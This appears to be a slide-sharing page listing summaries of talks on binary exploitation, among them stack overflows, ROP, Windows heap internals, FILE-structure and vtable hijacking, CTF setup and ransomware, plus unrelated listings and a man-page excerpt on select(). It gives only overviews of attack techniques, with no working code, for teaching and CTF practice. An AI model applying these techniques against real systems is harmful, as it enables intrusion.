The document provides an overview of basic penetration testing techniques including buffer overflow vulnerabilities, return oriented programming (ROP), format string vulnerabilities, and ways to bypass data execution prevention (DEP) and address space layout randomization (ASLR). It discusses stack-based buffer overflows, the structure of the x86 stack, overwriting the return address, and controlling the instruction pointer. It also covers ROP techniques like ret2libc, gadgets, chaining, and using libc functions. Finally, it briefly mentions tools like pwntools, ROPgadget, and techniques like IO wrapping and LD_PRELOAD hijacking.
Introduce Brainf*ck, another Turing complete programming language. Then, try to implement the following from scratch: Interpreter, Compiler [x86_64 and ARM], and JIT Compiler.
Windows 10 Nt Heap Exploitation (English version)Angel Boy
The document discusses the Windows memory allocator and heap exploitation. It describes the core components and data structures of the NT heap, including the _HEAP structure, _HEAP_ENTRY chunks, BlocksIndex structure, and FreeLists. It also explains the differences between the backend and frontend allocators as well as how chunks of different sizes are managed.
Vmlinux: anatomy of bzimage and how x86 64 processor is bootedAdrian Huang
This slide deck describes the Linux booting flow for x86_64 processors.
Note: When you view the the slide deck via web browser, the screenshots may be blurred. You can download and view them offline (Screenshots are clear).
Play with FILE Structure - Yet Another Binary Exploit TechniqueAngel Boy
The document discusses exploiting the FILE structure in C programs. It provides an overview of how file streams and the FILE structure work. Key points include that the FILE structure contains flags, buffers, a file descriptor, and a virtual function table. It describes how functions like fopen, fread, and fwrite interact with the FILE structure. It then discusses potential exploitation techniques like overwriting the virtual function table or FILE's linked list to gain control of program flow. It notes defenses like vtable verification implemented in modern libc libraries.
Build a full-functioned virtual machine from scratch, when Brainfuck is used. Basic concepts about interpreter, optimizations techniques, language specialization, and platform specific tweaks.
This document provides information about x86 architecture including registers, flags, modes, common instructions, Intel and AT&T syntax, system calls, examples, and references. It defines the purpose of key registers like EAX, EBX, ESP and flags. It explains real and protect modes and differences between Intel and AT&T syntax. Examples demonstrate how to write assembly code and call system calls. References provided can be used to learn more about x86 assembly programming.
The document discusses C++ exploitation techniques including name mangling, virtual function tables, vtable hijacking, vectors, strings, and memory allocation/deallocation functions like new and delete. It provides details on how virtual function tables are used to implement polymorphism in C++ and how vtable hijacking can be used to exploit vulnerabilities by forcing a vtable and hijacking the virtual function pointer to call shellcode. It also explains how vectors and strings are implemented dynamically in memory and their memory layout.
Windows 10 Nt Heap Exploitation (Chinese version)Angel Boy
The document discusses Windows memory allocation and the NT heap. It describes the core data structures used, including the _HEAP, _HEAP_ENTRY chunks, and _HEAP_LIST_LOOKUP BlocksIndex. It explains how allocated, freed, and VirtualAlloc chunks are structured and managed in the Back-End, including using freelist chains and BlocksIndex to efficiently service allocation requests.
The document discusses LR parsing, which is a technique for parsing input strings according to a context-free grammar. It provides examples of parsing the input string "1 + 2 * 3" according to a sample grammar using an LR parsing table. Each step of the parsing is explained, including shifting and reducing grammar rules based on the table entries and the stack contents. The overall process demonstrates how LR parsing uses a parsing table derived from the grammar to iteratively parse the input from left to right.
FISL XIV - The ELF File Format and the Linux LoaderJohn Tortugo
These are the slides used in a lecture I gave in the XIV International Board on Free Software. In this lecture I gave a brief overview of the ELF specification (the ELF specification is a document describing the format of executable, shared libraries and relocatable objects files used in Linux and many others operating systems) and the Linux dynamic loader (which is a program that acts together with the OS to create and initialize a program address space among others tasks).
The document discusses the internals of the Windows heap and how it can be exploited for arbitrary memory overwrites. It covers the key data structures used in heap management like segments, free lists, lookaside tables, and virtually allocated chunks. The algorithms for allocation and freeing memory from the heap are explained in detail. Special techniques for reliable heap exploitation are presented for overcoming issues with service pack dependencies and unknown addresses.
This document provides an outline for a Capture the Flag (CTF) event with details on CTF concepts, server setup, and examples of challenges. Some key points:
- It introduces CTFs and the AIS3 final CTF event, which will use a jeopardy style format across categories like Misc, Binary, Pwn, Web, and Crypto.
- It provides instructions for setting up a CTF server on Linux with tricks like disabling stack protectors, allowing code execution in the stack, and disabling address space layout randomization (ASLR) to make challenges simpler.
- It outlines some simple initial challenges like a basic buffer overflow example in C, using cryptography, and two pwn
TDOH 南區 WorkShop 2016 Reversing on WindowsSheng-Hao Ma
The document discusses various topics related to reversing Windows programs, including:
1) The structure of Windows Portable Executable (PE) files and processes. It covers the import address table, image base, and finding the program entry point.
2) x86 assembly language concepts like opcodes, registers, data types, calling conventions, and function calls.
3) Tools for reversing including IDA Pro, OllyDbg, and Cheat Engine. It provides instructions on using these tools to analyze PE files, disassemble code, and debug processes.
The document discusses domain generation algorithms (DGAs) used in malware command and control networks and how they have evolved over time. It provides examples of specific DGAs like Conficker, Cryptolocker, and Tinba. It also describes how intelligence can be gathered on DGAs by reverse engineering them, monitoring generated domains for resolutions, and tracking associated IP addresses and nameservers. The goal of DGAs from an adversary perspective is to increase the resilience of command and control structures against takedowns.
The document discusses methods for identifying devices on a local area network (LAN). It explains that traditional intrusion detection and prevention systems assumed all LAN devices were PCs, but with the rise of IoT, devices now include appliances, sensors, and more. The document then outlines several passive methods for detecting LAN devices, including checking: (1) the device MAC address' organizationally unique identifier to determine brand, (2) DHCP options like client identifier for fingerprints, (3) HTTP user-agent strings for clues, and (4) common applications used. Identifying LAN devices provides benefits for monitoring, access control, and generating threat intelligence.
This document provides an overview of ransomware, including what it is, how it spreads, examples of ransomware families, and prevention strategies. Ransomware encrypts files on an infected system and demands payment, usually in cryptocurrency, to decrypt the files. It spreads through spam emails containing malicious attachments or links, compromised websites using exploit kits, and by exploiting vulnerabilities in operating systems. The document demonstrates ransomware infections through snapshots and shares folders. Prevention includes regularly backing up important files, avoiding unsolicited documents, and keeping systems updated.
The document provides an introduction to pwn, which refers to fully controlling another person's device by exploiting vulnerabilities. It discusses what pwn is, how to infiltrate systems, common exploitation techniques like buffer overflows, and gives an example lab outline. The key points are that pwn involves using exploits to gain unauthorized access and control of servers by leveraging bugs in binaries or logic flaws. Common vulnerabilities include unfiltered user input, array index errors, and logical flaws.
O'Reilly Velocity New York 2016 presentation on modern Linux tracing tools and technology. Highlights the available tracing data sources on Linux (ftrace, perf_events, BPF) and demonstrates some tools that can be used to obtain traces, including DebugFS, the perf front-end, and most importantly, the BCC/BPF tool collection.
This talk gives a short introduction into buffer overflows, how to exploit them and which counter measures are used in openSUSE Linux to make exploitation harder.
We'll cover stack canaries, fortify source, address space layout randomization and NX. We'll see how they work and how they can be circumvented in a live demo of a working exploit that manages to circumvent these security measures.
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to ustakesako
The document discusses various programming languages and their characteristics in a non-standard formatting without using typical alphanumeric characters.
(1) It examines MS-DOS 8086 assembly language programming and describes executing code on 16-bit x86 CPUs through binary instructions.
(2) It also examines JavaScript, Perl, Ruby and compares some of their common features like comment syntax and string interpolation.
(3) It then proposes executing x86 code without using binaries by manipulating the registers through hexadecimal subtraction and bitwise operations, though this method would be difficult to program and debug.
The document discusses exploiting a buffer overflow vulnerability in Internet Explorer's VML implementation (MS06-055) to execute arbitrary code. It describes overwriting the structured exception handler to gain control of the instruction pointer, using heap spraying to load a buffer in memory, and having the instruction pointer jump to the buffer to execute shellcode and spawn a command shell. Metasploit is introduced as an open-source framework for developing exploits.
This document discusses return oriented programming (ROP) as a technique for exploiting buffer overflows. It explains that on x86, the return address is stored on the stack, so by overflowing a buffer an attacker can control program flow. It then describes different ROP techniques like calling library functions or using "gadgets" that end in return to chain together snippets of code to achieve objectives like executing a shell.
Debugging linux kernel tools and techniquesSatpal Parmar
This document discusses tools and techniques for debugging the Linux kernel, including debuggers like gdb, built-in debugging facilities, system logs, and crash dump analysis tools like LKCD. It outlines common issues like kernel crashes and hangs, and provides an example of analyzing an "oops" crash dump to identify the failing line of code through tools like ksymoops. It also covers generating a full system memory dump using LKCD for thorough crash investigation.
Troubleshooting Linux Kernel Modules And Device DriversSatpal Parmar
The document discusses various techniques for debugging Linux kernel modules and device drivers, including:
1) Using printk statements to output debug messages from kernel space.
2) Watching system calls with strace to debug interactions between user and kernel space.
3) Adding /proc file system entries and write functions to dynamically modify driver values at runtime.
4) Enabling source-level debugging with tools like kgdb to debug at the level of C source code.
The document discusses various techniques for debugging Linux kernel modules and device drivers, including:
1) Using printk statements to output debugging messages from within the kernel.
2) Examining the interaction between kernel and userspace using strace to see system calls.
3) Adding entries to /proc filesystem for additional output.
4) Enabling kernel debugging with kgdb or hardware debuggers.
5) Common error types like kernel panics and oops messages that indicate issues.
The document discusses exploring the x64 architecture, covering topics such as the x64 application binary interface, memory layout differences between x86 and x64, API hooking and code injection techniques for x64, and differences in system calls between x86 and x64. It provides an overview of key technical details and concepts for developers working with x64 platforms.
Compromising Linux Virtual Machines with Debugging MechanismsRussell Sanford
This presentation covers utilizing VMwares (GDB) debugging protocol to invasive inject commands into a Linux-x64 target. Automatic detection of kernel API is performed to locate _vmalloc & call_usermodehelper* functions across all 3x and 4x kernels.
AddressSanitizer and ThreadSanitizer are tools for finding bugs and vulnerabilities in the Chrome browser and server applications. AddressSanitizer detects buffer overflows and use-after-free errors. ThreadSanitizer detects data races in C++ and Go code. MemorySanitizer detects uninitialized memory reads. The tools use compiler instrumentation and run-time libraries to monitor memory accesses and detect errors. Over 1000 bugs have been found using these tools in Chrome and Google server applications.
AddressSanitizer and ThreadSanitizer are tools for finding bugs and vulnerabilities in the Chrome browser and server applications. AddressSanitizer detects buffer overflows and use-after-free errors. ThreadSanitizer detects data races in C++ and Go code. MemorySanitizer detects uninitialized memory reads. The tools use compiler instrumentation and run-time libraries to detect these types of bugs. Over 1000 bugs have been found using these tools in Chrome and Google server applications.
AddressSanitizer and ThreadSanitizer are tools for finding bugs and vulnerabilities in the Chrome browser and server applications. AddressSanitizer detects buffer overflows and use-after-free errors. ThreadSanitizer detects data races in C++ and Go code. MemorySanitizer detects uninitialized memory reads. The tools use compiler instrumentation and run-time libraries to detect these types of bugs. Over 1000 bugs have been found using these tools in Chrome and Google server applications.
An introduction to exploit development.
I gave this talk at Hack the North 2014, and most of this information is pulled out of classics like Smashing the Stack for Fun and Profit, so there shouldn't be anything novel in here.
Performance tweaks and tools for Linux (Joe Damato)Ontico
The document discusses various Linux performance analysis tools including lsof to list open files, strace to trace system calls, tcpdump to dump network traffic, perftools from Google for profiling CPU usage, and a Ruby library called perftools.rb for profiling Ruby code. Examples are provided for using these tools to analyze memory usage, slow queries, Ruby interpreter signals, thread scheduling overhead, and identifying hot spots in Ruby web applications.
This document provides an overview of Windows user-mode debugging concepts like processes, threads, stack frames, and the WinDbg debugging tool. It discusses how to set up WinDbg and analyze crashes through examples like examining stack frames, debugging a simple crash, and commands commonly used in WinDbg. The document concludes with demonstrating how to analyze an IMA service crash using a memory dump.
¡Ups! código inseguro: detección, explotación y mitigación de vulnerabilidade...Software Guru
This document discusses code that is vulnerable to various exploits and summarizes explanations of exploits. It includes code for writing notes to a file that is vulnerable to format string bugs and buffer overflows. It also includes code for searching notes that could be exploited through malformed input to read arbitrary files or crash the program. The document walks through examples of exploiting buffer overflows, format string bugs, and other vulnerabilities.
Finding Xori: Malware Analysis Triage with Automated DisassemblyPriyanka Aash
In a world of high volume malware and limited researchers, we need a dramatic improvement in our ability to process and analyze new and old malware at scale. Unfortunately, what is currently available to the community is incredibly cost prohibitive or does not rise to the challenge. As malware authors and distributors share code and prepackaged tool kits, the white hat community is dominated by solutions aimed at profit as opposed to augmenting capabilities available to the broader community. With that in mind, we are introducing our library for malware disassembly called Xori as an open source project. Xori is focused on helping reverse engineers analyze binaries, optimizing for time and effort spent per sample.
Xori is an automation-ready disassembly and static analysis library that consumes shellcode or PE binaries and provides triage analysis data. This Rust library emulates the stack, register states, and reference tables to identify suspicious functionality for manual analysis. Xori extracts structured data from binaries to use in machine learning and data science pipelines.
We will go over the pain-points of conventional open source disassemblers that Xori solves, examples of identifying suspicious functionality, and some of the interesting things we've done with the library. We invite everyone in the community to use it, help contribute and make it an increasingly valuable tool in this arms race.
Email Marketing in Odoo 17 - Odoo 17 SlidesCeline George
Email marketing is used to send advertisements or commercial messages to specific groups of people by using email. Email Marketing also helps to track the campaign’s overall effectiveness. This slide will show the features of odoo 17 email marketing.
Bipolar Junction Transistors and operation .pptxnitugatkal
A transistor is a type of semiconductor device that can be used to conduct and insulate electric current or voltage. A transistor basically acts as a switch and an amplifier.
Odoo 17 Project Module : New Features - Odoo 17 SlidesCeline George
The Project Management module undergoes significant enhancements, aimed at providing users with more robust tools for planning, organizing, and executing projects effectively.
Vortrag auf der Sub-Konferenz "Planning, democracy and postcapitalism" als Teil der Jahrestagung der französischen Assoziation für politische Ökonomie (Association française d’économie politique) 2024 in Montpellier/Frankreich.
Types of Diode and its working principle.pptxnitugatkal
A diode is a two-terminal polarized electronic component which mainly conducts current in one direction and blocks in other direction.
Its resistance in one direction is low (ideally zero) and high (ideally infinite) resistance in the other direction.
A history of Innisfree in Milanville, PennsylvaniaThomasRue2
A history of Innisfree in Milanville, Damascus Township, Wayne County, Pennsylvania. By TOM RUE, July 23, 2023. Innisfree began as "an experiment in democracy," modeled after A.S. Neill's "Summerhill" school in England, "the first libertarian school".
Introduction to Literary Criticism 10 (1).pptxjessintv
Introduction to Literary Criticism prepared by Mrs.V.Jesinthal Mary,Asst.Professor,Dept of English and other foreign Languages (EFL), SRMIST Science and Humanities, Ramapuram,
Chennai-600089
What is the Difference Between Lot & Serial Number in Odoo 17Celine George
In Odoo, both lots and serial numbers are used for tracking inventory, Now we can take look into about the difference between the lot number and serial number through this slide.
Plato and Aristotle's Views on Poetry by V.Jesinthal Maryjessintv
PPT on Plato and Aristotle's Views on Poetry prepared by Mrs.V.Jesinthal Mary, Dept of English and Foreign Languages(EFL),SRMIST Science and Humanities ,Ramapuram,Chennai-600089
How to Configure Extra Steps During Checkout in Odoo 17 Website AppCeline George
Odoo websites allow us to add an extra step during the checkout process to collect additional information from customers. This can be useful for gathering details that aren't necessarily covered by standard shipping and billing addresses.
How to Configure Field Cleaning Rules in Odoo 17Celine George
In this slide let’s discuss how to configure field cleaning rules in odoo 17. Field Cleaning is used to format the data that we use inside Odoo. Odoo 17's Data Cleaning module offers Field Cleaning Rules to improve data consistency and quality within specific fields of our Odoo records. By using the field cleaning, we can correct the typos, correct the spaces between them and also formats can be corrected.
110. IO Wrapper
• select() and pselect() allow a program to monitor
multiple file descriptors, waiting until one or more of
the file descriptors become "ready" for some class
of I/O operation (e.g., input possible). A file
descriptor is considered ready if it is possible to
perform a corresponding I/O operation (e.g.,
read(2) without blocking, or a sufficiently small
write(2)).
http://man7.org/linux/man-pages/man2/select.2.html